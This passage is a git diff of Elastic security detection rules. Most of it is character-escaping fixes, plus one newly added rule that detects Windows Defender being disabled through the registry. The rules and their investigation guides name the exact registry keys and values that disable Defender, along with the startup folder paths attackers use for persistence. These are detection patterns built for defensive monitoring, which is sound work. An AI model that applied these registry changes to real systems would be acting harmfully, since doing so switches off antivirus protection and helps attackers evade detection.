(for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json index 2789980526d..eef855c4a20 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by host.id, process.entity_id with maxspan=5s\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.code_signature.trusted == false and\n /* suspicious paths can be added here */\n process.executable : (\"C:\\\\Users\\\\*.exe\",\n \"C:\\\\ProgramData\\\\*.exe\",\n \"C:\\\\Windows\\\\Temp\\\\*.exe\",\n \"C:\\\\Windows\\\\Tasks\\\\*.exe\",\n \"C:\\\\Intel\\\\*.exe\",\n \"C:\\\\PerfLogs\\\\*.exe\")\n ]\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n ]\n", "related_integrations": [ { @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json index 5a57e0cdfb2..01403fb7d07 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_104.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json index 9bd27ff1ab5..fdc8293528b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_105.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json index 29eb21459af..104f1369f25 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_106.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json index c3100cbf645..660484c2129 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_107.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json index 44c496449b0..021fe6de889 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_108.json @@ -58,7 +58,7 @@ ], "risk_score": 21, "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json new file mode 100644 index 00000000000..3974659f58a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2ffa1f1e-b6db-47fa-994b-1512743847eb_109.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies modifications to the Windows Defender registry settings to disable the service or set the service to be started manually.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Defender Disabled via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Windows Defender Disabled via Registry Modification\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for configurations that disable Windows Defender or the start of its service.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if this operation was approved and performed according to the organization's change management policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n- Microsoft Windows Defender Tampering - fe794edd-487f-4a90-b285-3ee54f2af2d3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Re-enable Windows Defender and restore the service configurations to automatic start.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (\n (\n registry.path: (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\"\n ) and\n registry.data.strings: (\"1\", \"0x00000001\")\n ) or\n (\n registry.path: (\n \"HKLM\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\System\\\\*ControlSet*\\\\Services\\\\WinDefend\\\\Start\"\n ) and\n registry.data.strings in (\"3\", \"4\", \"0x00000003\", \"0x00000004\")\n )\n ) and\n\n not\n (\n process.executable : (\n \"?:\\\\WINDOWS\\\\system32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\Security Agent\\\\NTRmv.exe\"\n ) and user.id : \"S-1-5-18\"\n )\n", + "references": [ + "https://thedfirreport.com/2020/12/13/defender-control/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "2ffa1f1e-b6db-47fa-994b-1512743847eb", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + }, + { + "id": "T1562.006", + "name": "Indicator Blocking", + "reference": "https://attack.mitre.org/techniques/T1562/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "2ffa1f1e-b6db-47fa-994b-1512743847eb_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json b/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json index 63f0afbf6d4..218a2f29aa3 100644 --- a/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json +++ b/packages/security_detection_engine/kibana/security_rule/301571f3-b316-4969-8dd0-7917410030d3_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json index 76dbea350e7..fa54f506818 100644 --- a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json +++ b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json index a4ef8f5387e..675343eab96 100644 --- a/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json +++ b/packages/security_detection_engine/kibana/security_rule/30562697-9859-4ae0-a8c5-dab45d664170_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json index 3e3f27a2f57..63db55d48cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json index d2c2648923d..09dc51389e7 100644 --- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_2.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json index 63c00776ecb..aea5d917d2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_3.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json index b627c2ca9b6..1ad7e49f627 100644 --- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_4.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json index 1f18c79dd2b..a247d546f5c 100644 --- a/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json +++ b/packages/security_detection_engine/kibana/security_rule/30bfddd7-2954-4c9d-bbc6-19a99ca47e23_5.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json b/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json index e2674d5ce92..247240f54fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/3115bd2c-0baa-4df0-80ea-45e474b5ef93_100.json +++ 